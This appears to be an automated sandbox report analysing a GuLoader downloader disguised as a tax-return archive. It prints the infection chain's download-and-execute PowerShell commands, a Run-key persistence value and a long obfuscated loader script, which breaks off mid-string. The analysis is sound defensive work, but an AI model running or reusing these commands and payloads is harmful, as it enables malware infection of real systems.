guloader | 9beab2df8086678f91523428edf8c364e7da48ab94b330eecc7d791d456ba220

Resubmissions

13/02/2023, 21:15

230213-z343ssgc96 10

13/02/2023, 21:10

13/02/2023, 21:08

13/02/2023, 21:03

13/02/2023, 21:01

Analysis

max time kernel
209s
max time network
211s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2023, 21:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Robert Sopko Tax Returns.zip
Size

899B
MD5

aa5d8f3cc407183a449035e22adb41a7
SHA1

46baf627df4721b3bb1d57ac6cad3a0115271e06
SHA256

9beab2df8086678f91523428edf8c364e7da48ab94b330eecc7d791d456ba220
SHA512

20908c127d39d81c39ab6fd23a2ed01e55d1b2c1f835704a50899180669fe81af2d9106c3c47056d1ab5d44abbd13c3be2a7665c20413a4fdf20bd752a45d259

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
99	1404	powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ielowutil.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	ielowutil.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Boligaktivisterne = "%SaltoQ% -w 1 $Victor169=(Get-ItemProperty -Path 'HKCU:\\Skattekronen\\').Disentangle;%SaltoQ% ($Victor169)"	ielowutil.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2220	ielowutil.exe
2220	ielowutil.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5004	powershell.exe
2220	ielowutil.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5004 set thread context of 2220	5004	powershell.exe	120

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Sacramese.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1404	powershell.exe
1404	powershell.exe
4964	powershell.exe
4964	powershell.exe
5004	powershell.exe
5004	powershell.exe

Suspicious behavior: MapViewOfSection 13 IoCs

pid	Process
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1712	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1712	AcroRd32.exe
1712	AcroRd32.exe
1712	AcroRd32.exe
1712	AcroRd32.exe
2220	ielowutil.exe
1712	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 1404	2220	WScript.exe	92
PID 2220 wrote to memory of 1404	2220	WScript.exe	92
PID 1404 wrote to memory of 2580	1404	powershell.exe	94
PID 1404 wrote to memory of 2580	1404	powershell.exe	94
PID 1404 wrote to memory of 1712	1404	powershell.exe	95
PID 1404 wrote to memory of 1712	1404	powershell.exe	95
PID 1404 wrote to memory of 1712	1404	powershell.exe	95
PID 1712 wrote to memory of 1096	1712	AcroRd32.exe	96
PID 1712 wrote to memory of 1096	1712	AcroRd32.exe	96
PID 1712 wrote to memory of 1096	1712	AcroRd32.exe	96
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2720	1096	RdrCEF.exe	99
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100
PID 1096 wrote to memory of 2680	1096	RdrCEF.exe	100

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Robert Sopko Tax Returns.zip"
1⤵
PID:4740

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\localhost\c$\Windows\System32\SyncAppvPublishingServer.vbs" n; Invoke-WebRequest http://0x6D.13561923/ele/Chugs.vbs -OutFile C:\Windows\Tasks\Sacramese.vbs; C:\Windows\Tasks\Sacramese.vbs; Invoke-WebRequest http://0x6D.13561923/ele/Return.pdf -OutFile C:\Users\Public\tax.pdf; C:\Users\Public\tax.pdf
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; Invoke-WebRequest http://0x6D.13561923/ele/Chugs.vbs -OutFile C:\Windows\Tasks\Sacramese.vbs; C:\Windows\Tasks\Sacramese.vbs; Invoke-WebRequest http://0x6D.13561923/ele/Return.pdf -OutFile C:\Users\Public\tax.pdf; C:\Users\Public\tax.pdf}
  2⤵
  - Blocklisted process makes network request
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Sacramese.vbs"
    3⤵
    - Checks computer location settings
    PID:2580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$trffetid = """Gen;UncFkaluLaknLilcBustCemiUnboRennPti HegSTratDamaGibmpopbheleSyssSoltKvanSupiOvenMongAle0Kom Geo{Kar Kul Stj Bro TampRetaEdgrAdeazebmVol(for[RreSNontErsrSkeiThynDobgRan]Int<SubMBesaRefnImpuSupmvaaiPastFortDmniteanDefgTro)Sla;brn Mid Wit Eti Tel<RevPFrirFonoTabdInvuFllkFortUndiSneoThenMilsTopaBifpIndpScuaDrarAusaunitKarecaurForsRen2ski3Tra8Zan bra=plu AlkNstretrawVal-IncORefbAlljEbreSorcrentPag DakbBisyInctJoreChr[Pur]Sko Sai(Xer<UdbMLacarhenHawuGnamborifamtBrotBiliroenLamgEst.FllLOveeJesnArbgmintSnuhBiz Bis/Afs Blo2Hjl)Bro;Ver Flj Ris Pas ManFfejoTnkrlys(Vak<FigbTaleKmptRhijFdeeUndnPostPlafFraoTrsrAirmOpfnTsedSpaeOptnHereCur=ove0Pha;Epi Dor<StabShieStytIodjBroeBennSprtkwafForosanrFormMednAmydUndelednPoseCor Tem-quilProtWas Sti<SalMBataGunnScluJoumFiriFortDyetBaniSernFlagLig.TunLFrueRednForgOuttWathSep;Myt Fri<UnpbCapeYtttSupjlineReanUnntPrefDieoNonrDivmTranKildudteGoanVideHor+Ato=Alk2tam)Mon{Bru Gla Fre Bal brn And Dat Non Uni<MosPTolrDivoPeodFlyuDankStatTakiSpioBrunWersBriaHelpEmbpNonaBelrPenaGastUnpeWarrSlvsEnf2Skk3amt8Dum[Amp<SmabGaleSeltRunjDioeHibnRamtStufAaroVanrAfbmimmnTurdAukeSinnUndeher/Bil2Pro]Prv Scu=Kal Slv[procTitoBuknDesvStaeMourReftDia]Ste:Dal:SteTAbsoAkeBCheyZertNeveMor(Ord<LigMKlkaIntnAmiuSubmPokiDortanatFusiLornChagQua.MicSOveuForbMalsBurtVesrIndiCalndelgBrn(Det<AntbSnoeSuptFrejoveeMotnFaltWilfGuloIuurAbimOffnSolddipetornUlteInt,Uri Skj2Sol)Agn,Fre Tho1Cor6Glo)Asp;Jac Inv Ham<UpcPBetrEnloTardHoluFolkSpitOveiMatoOvenOpssHanaPoupUnmpRetaMorrLovaDemtTrieGlartristro2Dom3Cal8Phy[Sle<LevbVoueBertVeljDadeGennHextBryfMicoNumruremChenPasdEkseGolnNyseEur/Non2Gig]Sma Tro=Udd Kos(Fen<IscPBelrModoIgndAntuPogkKartBriiBoboBajnPaaskilaPurpBerpFdsaPaprTreaFlltOuteRodrEpisMal2Skr3Waf8Pik[Hul<KitbDooeSnotRatjPreeThanUnstVeefLivoRagrYvemCabnGasdLbeeCatnLuteSta/fon2ter]Pro Gip-TalbRepxAppoBawrVug kom1Ind9Bul0Kur)Por;Klt Ski Ind Ind Imm}Igu Tru[InaSSnitCemrFiniCalnAnggTve]duo[CycSGreyIdesFortSnieColmTig.herTColeTalxFortDri.DasEMyrnOpscSpeoDisdBreiRacnBragFol]Har:Abn:NieAStaSBanCEneICheICor.MasGAcceUtitOasSDectMasrtroiSamnNongSkr(Emi<NumPIngrSvaoSwadSkauFynkvaktVaniFlloCoinCocsDefaPerpNonpStyaUtirAnlaCabtNoneStirTvisang2Ard3Mid8Apo)Cle;Han}Amb<PriPFlalColeSkynLapuTuzmPeadBesiConsSirkAaduIncsJersUnmiTrioEcuntoneFarrGensKor0Zyg=AutSDegtCarasidmCrebmulePsesFortNonnDdniStrnKingBri0Pak Fug'FrsERetDWasCafh7ScuCHvaDStrCEpiASinDLigBOveDUpt3Dag9Red0TelDAlmAbykDFor2CalDAll2Sol'kon;Lok<forPKrilBedeDeknAliuFaumOpgdbediArmsMezkSexuOblsBldsMuliHicorepnSaneCharLigsOve1Psy=ScrSDiptMosaParmFlabUndePensImptConnFiliLaunNeggAfl0Pap For'TraFMur3DemDSal7SkiDSkkDSkiCRecCRefDBox1LigCVidDUnsDDri1NonDAlt8AagCFatAFor9Sta0FunEGyn9BilDuop7BriDSty0Blo8MurDMis8sadCVen9sva0UnpEDieBsekDMuo0DisCHelDSinDKeeFTinDOps8IndDUndBdolFDyk0FagDyanFCacCStuAAmnDSup7BarCDis8SkiDBoxBGadFOve3hkaDUnoBGetCinfAtesDRet6NorDRes1FdeDSigARenCAnvDFle'Med;Uns<GarPBoplAnoeClinRoeuUnpmFredHaniTylsSekkFisuBhasEnesIneiStroFrinUnoeDelrSlasPre2sal=GraSProtFdsaElumBrybarbenutsHoltBjenbesiFejnMargUnf0Alu Gte'DemFBla9InaDdryBBevCEctAAncEEnrEUdbCBlaCantDeks1hypDAnnDintFOddFAmiDFliARelDAegAStoCsudCSacDBirBFibCTyrDPreCBolDDes'Reg;Con<SphPDeflPreeEscnReiuCocmpsydobjiLepsCoukLyduRadsFissRefiParoOvenTraeCynrAlesSad3Van=SpoSMootEjeaArbmHaibFlaeRegsAantTranProiOutnUtngBur0Fis Paa'FalEGamDPadCGra7FugCMusDSkaCAnfANotDUnbBDagDUre3con9Nut0MetEHovCLarCamaBUdgDPle0HelCcauABarDPre7RkkDSpr3DisDIntBFly9Bri0EncFNeb7DirDUds0MorCGalAVarDvirBAtwCTerCInfDsam1tilCemnEErhEUniDBelDGemBDdsCSpiCJukCXan8GniDBro7SocDProDoloDEtaBAnnCCasDgul9San0DiaFReg6VorDManFBriDDet0PerDBeeAPrvDStr2DolDUndBRetEDunCFriDcalBAfgDLob8Gen'Vir;ord<TamPRaalSpreSoenComuLgnmBotdToniIntsWorkHaauEvasPrisStaiEksoGarnSlaeGrirRamsJej4Imp=OveSStatMrkaunimmunbHeneTeksViltTrunforiisinborgDri0Ban Uds'BalCCenDacrCnasAParCSolCtilDMum7RelDBes0SymDPla9Def'Eil;Urm<SysPForlDimeMahnPajuHjtmFevdEcoinonsDrikTrauAllsSkosInsiEupoPlanBloeHetrStisCon5inv=SarSFlutPreaLrtmPosbReieBorsFretAffnNoniTosnZo gSvi0Pas Eks'AfgFVaa9divDSamBBriCSkrAErhFTin3UneDsha1UnwDGanAgenCcomBSivDJov2OveDShtBBunFArs6PalDSkmFangDFor0CriDIndANedDUds2epoDstaBIld'per;Ops<CurPDomlSkaeNonnFejuPenmComdBepiSubsCadkUniuHomsPolsAssiHedoKonnHareSanrHousOpv6Bef=EmbSPhothypaTanmIsobToeeRumsCaltAlbnSamiBounGodgObt0Grn aqu'HypEspiCCodENutATerEDadDUndCForEMarDLgnBUnnDTegDLejDSpa7SarDEthFSjlDBea2RasFCay0ZabDGriFfibDAug3IntDBanBSur9Spr2Str9klaEAmoFIgn6SkyDNon7WanDKotAparDKltBSubFMilCBooCLuc7BreEOveDAstDpur7RadDRen9Tra9Fat2Bra9HypENonEManEIdrCinkBFalDsemCPilDSoe2JorDWig7unmDForDRed'Hut;Dow<RemPsynlNoneOstnAstuDramUnddBiliVessFlekBacuTensGensGeniAnioWilnPaueKwarSkosUdv7Mag=MyrSspetCheaPrimUdvbDeteDupsRebtVaanproishenUndgEno0Bre Unr'ForETerCKreCLynBAbsDNon0ribCBleAFiaDSni7epiDSkv3MelDAfsBDia9Nat2Wag9BesEExpFBaa3DepDJovFthoDWal0ResDAggFDhaDtra9EleDAfgBTunDIndAUnp'Kro;Spi<UklPManlDmoeDomnupluResmSjadBegiYensPiskEftuHuzsBeosDroiLaboSuknGeneOutrTonsSub8Typ=EksSGuttSadaBudmNombSuseJahsIndtUnrnresiSlinKnsgenc0Ula sha'AchEAfsCEpiDDraBTorDFri8UnpDDam2KriDPreBFagDLskDBasCStiASluDGolBCeiDRasAZucFFriASpeDHalBFluDDep2IncDByeBSpiDObl9CurDTabFNokCUdsAOveDOplBOrp'Uni;Pou<TalPBuglUdlenydnIntuStrmFstdHuniGizsHelkTrouMisspapsLoriExaoTyfnUnweProrDipsLyd9Sel=NonSDittComaChamAfgbHepeEffsFoltMesnUdliStrnSangSve0Slv Dia'NonFFis7TwaDNot0EtiFReg3SkoDVedBisoDCed3aflDHac1HjeCFabCRdeCGge7MesFHyp3AfsDSam1BlaDWooAVarCCavBEniDEmn2UniDMadBHul'Red;Cos<BetAElspCuroNulgsnuaBaplPayanitcCurtAdgeureuStimKoe0Var=TaxStiptEksaPhomPrebNebeforsSisthonnNoniGrnnHvigIns0Ery Nor'KurFTil3FoeCBlo7TilFEpiAJorDgeoBVesDSem2OveDBygBNatDFor9DepDTroFadoCZenAAfkDIldBreuEBetASamCBri7PawCSovEPerDGuiBFll'bru;Gen<AkaAIndpVinoCargStoaPrvlsopaYdecViltcopeUnruFormMel1eth=BinSUdatHonaScrmElibAfgeGifsStatInenStoiSknnTolgreg0Fet Van'BasFAnsDKurDWit2DraDRodFnatCKogDKiwCHelDlid9Flu2Chr9TjrEFotEMinEUdaCDicBGruDGenCFinDdue2LunDSam7dipDForDNvn9Del2Stb9ProEVikEProDStiDDokBMulDDemFFliDRen2FjoDAdeBAvnDRevAHel9Jus2Und9ForEMooFKloFretDKod0HavCLocDFrdDEdm7DulFHypDAntDKev2DisDUndFSibCOpiDEndCSkiDBra9Gus2Aqu9RunEHydFUndFPytCFinBUndCActAforDSil1HytFEmbDTraDHaw2PelDKomFGhaChavDDilCTreDAnd'Zon;Opk<UxoAPiepLysoBesgCavaEmolSpraAlfcLeotKloeAlkuRvfmtol2Tur=UnfSPastparaParmBlsbCreeInvsHydtcopnVeriFlanUpsgBal0Cym Sma'MohFPer7CitDSam0verCAfv8NonDRes1EksDCir5RodDForBFib'Gru;Ink<FluASigpRegoCregBriaStolFalaskocOpltToteTriuImpmSli3Hom=pylSCoutSpeaSemmParbArveBetsSkvtRinnproiTapnSungEph0Ret Exc'HemEGenEBraCIncBAskDSepCProDLgr2saaDEnu7StuDHypDNak9Jor2Dep9StaETraFBre6CraDByg7HypDPosATroDjinBTraFKokCStaCNed7UtoELnsDResDSwa7IndDRig9pre9Doc2Orn9CraETelFduk0GenDZinBForCTek9LinEKniDSteDEur2DatDUre1OprCKamAKly9Mun2Cup9TraEConEUns8CamDOps7ForCSelCUanCPadAUnvCOveBUntDSaxFbenDRib2Ult'Aut;Gau<HavATilpStooPosgNovaMedlUnzaSlycSkutOleeTimuPhamTee4Eff=ZimSFyltSupaTidmHidbUnpeBarsDemtHydnSupiSlenJongSam0Ove mil'TheEFal8GamDUnv7egaCAntCansCBrdAChaCSacBPasDFalFUdmDPar2SubFXanFTrnDkni2SubDUnf2KamDBro1fkaDOveDFin'Str;Fej<TabAannpPatoerogReaaZymlEftaHydcSprtInseBesuAntmDes5Mas=komSruntRegaLawmHmmbNabeFrisJadtDdlnPouiLignSulgven0Hom Opl'StaDage0GruCSnoALenDGavATrtDRev2SenDSca2Eth'Tar;Lit<AccAAilpLagoChigUfoaUtilsolamolcAbstTilePlauRemmTeg6Dep=EntSorotcutaCm msolbKereGensRektSubnUnsiDetnBatgvrd0Gyl Mil'LbsFskr0ronCChaAbukELiaEVapCMopCKarDKal1RegCTapAIndDPraBBinDHelDBikCKnoAFeuETnd8LgnDCar7NikCHamCBerCopdAReaCEffBOmrDAzoFJesDCoc2PolFSmi3SolDValBligDasc3TreDFis1HalCKilCFreCSpe7Lys'ken;Nos<GrnABripreeoIsmgUrhaGanlKraaKomcBultFeueResuLatmApp7Spl=SinSChitBekaBepmTenbMineBylsBeltSubnPeriDisnFedgPan0Fro Eth'AlyFSup7kogFPatBNonEDec6Cod'vol;Tod<HelAIndpProoPolgUndawhelKanaPapcAlmtRadelowuSulmRes8Hyp=JorSMottGruaHetmTilbSupeEmbsFortDisnCeniSknnUnegdeb0Beh Udv'UndEFds2Smg'Ins;Rut<UpsTUnwrDkkoOffeMednSofdSipeAngsDep=KonSMaitvesaFormBeabHomeSumsGautJagnTiriRednTafgRyg0Ala Psy'MikEThiBserEEffDuniFbirBUnsEPssCKin8KomDAri8HolCTrn'Pro;Kru<dareCavlAbjfDuerPeniophePildufoaPassGra=smaSSartUndaUnmmSkubErneTimsSmutEksnMiliantnIndgrek0Col Sam'PreFPutDOrsDSupFSquDSvi2FamDLde2TjeENat9NenDBre7TanDRig0MejDOpsAJovDAdl1ForCSho9FisEUneEManCPorCGweDTar1oveDNonDAflFBacFUds'Sko;tzafGruuRaanFoucCittPopiBrnoSornSan GenSQuotAleaglymEnkbEasebrasBoltAntnAbjiOrknSevgEpi2Eks2Kar Dev{MohPAntaSkirSugaMikmSta Unt(sou<RecCAmilCraoBoddLonpUrioIndlFullMid,spe Skr<DehSBreeStolMorvUnifTrooUplrLagsTylyAktnBareBesnwaydArkeProsUnd)Nod Val Pis Bre Sug Bef;San<DesCSkeoUblnUtmbYdeiFrunUndaOutsKon0Ala Tox=OutSBictnakasdvmIltbtraeUndsZintSemnRunibesnMorgKas0Att Lau'Rod9HypARucDEve8OveDHeyFundDPra2SpoDIciASylCsleDSynCBlaAIntDPetFKonDMan3EddDDop3TroDAntBBadCEarCslvDpan0TenDIbeBLitCForDpar9StbEKon8Sto3Wie9SprEeka9Gha6arsEMrk5AfsFStiFTafCMobEbilCbliEBerFTreAGifDhom1ivaDKla3CciDpebFPalDHyd7JouDRek0NavEOcc3Non8Arb4Hov8Dis4FulFDetDParCrteBDesCNatCStiCBasCPosDGlaBMomDAwk0PasCLamAPerFForAKulDLbl1CatDWin3TriDPlaFBloDBir7BolDEch0Tot9Kil0IllFSik9FugDTenBGutCFagAVerFNonFSjlCTilDOctCManDSkaDSfoBDisDYou3DisDKomCSveDSko2GenDFoe7UniDBenBVilCUntDIns9Hon6Opn9Unp7Sam9OplESalCNoe2Pul9UnrESamEBrn9GarDBef6HeaDdryBGruCNonCSitDTryBLnk9Nie3ficFSwo1HarDeyaCantDdob4BacDAfkBPapDOpsDForCTaaAFul9SorEPreCGam5Kva9BowEBlo9ParAUfoEArt1Int9Ann0HanFFor9ChiDSup2SecDUns1SerDSusCDanDDriFNatDPho2TalFkonFClaCOecDTagCStaDUndDFinBGydDBar3FruDTorCDenDDer2MesCPyr7TocFGulDCoeDUndFSpaDPreDOplDFou6NavDVelBCoc9HarEdis9His3BryFFriFUnsDRes0HjeDHemAAfs9OuaEMin9OrtAVreEMid1Sam9Bor0BygFSai2bakDAnt1CheDRegDPuzDPseFEleCRefAGloDCup7attDHjl1LovDFet0Dub9Mad0AfsEWilDPreCJttEGloDHje2SupDPhy7demCAppAKje9Mul6Tak9OpeARcdFHeaFBedCArbECerDMer1SjiDBeg9oveDPhaFPluDAto2SubDNonFAviDnugDSnaCAvlAKroDStrBForCcloBRacDBib3lot8Die6Bon9Scr7NatEAnt5Akv9Stt3Lev8FagFBioESlr3Kni9smu0ArbFPlaBKbsCGruFSvaCOxcBEskDFerFIntDUni2DksCUimDFor9Anl6Lbe9HysAAkrESciEClaDlim2ForDBatBFlaDWin0BogCModBSolDHje3FemDMidAIndDTri7LufCTakDMorDkon5GenCFlaBArsCBeiDThiCsovDSusDAls7croDSub1AmiDGen0KooDBorBsabCLigCGisCOffDOps8VlsEEne9Afh7Tan9FilETarCByg3Ree9Fri7Tri9Mac0FliFBef9LgeDOliBBulCBolAFesENepAFrdCTru7kldCValERegDLynBApt9Ber6Kin9ExiAMaaEDocEVolDFor2barDUneBtacDSal0StrCDisBEldDEnt3UdsDBowADesDSup7EssCBlaDBjaDMaa5BoaCAnvBmtrCKkkDUdmCRekDExhDRug7PriDBef1RoeDAll0ForDHenBHolCReiCKorCBurDTel8LurFAtt9Kas7Fer'Sne;Cer.Fri<UniAFlopUnvoSikginaaSeclMngaGnacBantUnceSatuLummPro7For Tie<TerCPlaoTnknScabDegiFennSulaKrasSwo0Cra;Ato<LogCGeooHomnelebLipiDesnMlkaSucsSnb5Dri Sem=Aff SpeSAuctblnaSlamGrnbYaneTassSamtCasnphoiSolnUnsgKva0Cak Cog'Pro9ForAlosESluESusDUndBkvaCNorCSkrCForDLgpDPre1PirDRob0KolDFra7FinDFre8amiDPut7intDKviDDfrDHypBHarCPotCRepDPle7adeDudd0SevDEnd9CauDAppBReaCPlaCBroDBor0VerDAfgBForCSigDTau9BlaEMel8Rec3Cel9MutEPro9KolAPapDLet8SkiDRedFKonDoxy2EryDFodAFadCLaiDGuiCMowALavDTveFPapDDen3SkaDHes3BulDLotBHviCkurCBoiDNyb0casDAgaBCeiCBumDsup9Pol0VarFPaa9FilDOttBsekCAfbAGenFBre3FejDHypBRegCSanARaaDOno6AgaDHal1MinDJerAPhr9App6Sto9LidASucESelEConDLse2DepDTaaBUdhDTuf0HjlCPreBStyDTit3besDSmuAunbDvek7KraCSikDfilDNon5ForCAarBTubCModDtelCPreDProDThu7skrDAsp1TurDAut0CatDFlyBPreCSkoCKilCAutDPre8MidCPro9Rib2Res9FroESulETyn5porEQuiAsloCsub7TelCSnoEcitDBilBFstEAtt5FlnEben3BlaEElh3Lin9SprEBanFUdvEGut9Aff6Bas9SttAUdkELinEBonDCor2HadDMagBAniDSem0RepCSagBPabDKli3FibDStaAAgrDRip7SviCYipDRecDken5OveCPenBTreClnsDShrCBulDSprDSyp7OpeDAmp1BaiDSup0BruDProBSkaCophCEneCFioDNor8LovDEch9afg2con9AffERej9FolAIrrEForEForDPre2NdrDOccBMicDCad0ProCSjaBIriDAbd3chaDLigAEdsDRes7UncCgneDMalDUdd5lydCLeiBMicCSabDeriCUpsDSylDGab7DisDMar1AnsDAfg0KasDNsvBudgCGapCVenCSkiDTvr8InaAFra9Hin7Tir9Dim7Nag'Fet;Cle.Adv<BelAHoopBoaoRecgeftaganlForafrecGratValeMisuBolmTra7Mis Fle<CulCForoprensnabSoniTysnPaaaundsdow5Arm;Hul<SmaCFjeoGldnExhbVegiNitneozaPldsApp1Tri rad=Jen BomSNontCeraLammnecbOpveBlosoritAgrnUndiLabnProgDuc0Blo 